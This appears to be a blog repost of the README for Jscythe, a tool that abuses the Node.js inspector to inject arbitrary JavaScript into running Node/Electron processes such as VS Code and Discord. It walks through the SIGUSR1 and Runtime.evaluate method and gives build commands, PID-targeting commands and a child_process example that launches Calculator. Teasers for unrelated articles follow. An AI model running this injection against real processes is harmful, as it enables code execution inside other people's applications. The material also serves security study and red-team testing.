Jscythe abuses the node.js inspector mechanism in order to force any node.js/electron/v8 based process to execute arbitrary javascript code, even if their debugging capabilities are disabled.
Tested and working against Visual Studio Code, Discord, any Node.js application and more!
SIGUSR1
signal to the process, this will enable the debugger on a port (depending on the software, sometimes it’s random, sometimes it’s not).SIGUSR1
.http://localhost:<port>/json
.Runtime.evaluate
request with the provided code.cargo build --release
Target a specific process and execute a basic expression:
./target/debug/jscythe --pid 666 --code "5 - 3 + 2"
Execute code from a file:
./target/debug/jscythe --pid 666 --script example_script.js
The example_script.js
can require any node module and execute any code, like:
require('child_process').spawnSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator', { encoding : 'utf8' }).stdout
Search process by expression:
./target/debug/jscythe --search extensionHost --script example_script.js
Run jscythe --help
for the complete list of options.
Docker is a powerful open-source containerization platform that allows developers to build, test, and deploy…
Docker is one of the most widely used containerization platforms. But there may come a…
Introduction Google Dorking is a technique where advanced search operators are used to uncover information…
Introduction In cybersecurity and IT operations, logging fundamentals form the backbone of monitoring, forensics, and…
What is Networking? Networking brings together devices like computers, servers, routers, and switches so they…
Introduction In the world of Open Source Intelligence (OSINT), anonymity and operational security (OPSEC) are…